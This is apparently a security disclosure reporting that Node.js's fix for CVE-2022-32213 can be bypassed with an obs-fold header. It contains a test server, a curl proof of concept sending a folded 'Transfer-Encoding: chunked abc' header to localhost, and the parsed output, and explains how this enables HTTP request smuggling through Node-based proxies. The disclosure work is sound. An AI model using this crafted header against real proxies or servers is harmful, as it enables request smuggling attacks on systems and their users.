CVE-2022-32213 bypass via obs-fold mechanic

## Summary The fix for CVE-2022-32213 can be bypass using an obs-fold, which Node's http parser supports ## Proof-Of-Concept ````` const http = require('http'); http.createServer((request, response) => { let body = []; request.on('error', (err) => { response.end("error while reading body: " + err) }).on('data', (chunk) => { body.push(chunk); }).on('end', () => { body = Buffer.concat(body).toString(); response.on('error', (err) => { response.end("error while sending response: " + err) }); response.end("Headers: " + JSON.stringify(request.headers)); }); }).listen(5000); ````` Send the obs-fold via curl ````` curl -vv -H $'Transfer-Encoding: chunked\r\n abc' --data "A" http://127.0.0.1:5000 ````` See that the server accepted the chunked request, and will incorrectly fold abc to the value of the Transfer-Encoding header. This is seen in the value of "transfer-encoding" as "chunked abc" in the printed headers. ````` Headers: {"host":"127.0.0.1:5000","user-agent":"curl/7.83.1","accept":"*/*","transfer-encoding":"chunked abc","content-type":"application/x-www-form-urlencoded"} ````` ## Impact If nodejs HTTP module is used as a proxy, then it incorrectly parses the transfer-encoding header as indicative of chunked request, while folding the headers and hence forwarding `Transfer-Encoding: chunked abc` which is not a valid transfer-encoding header to the downstream server. As such this can lead to the HTTP request smuggling as indicated by CVE-2022-32213.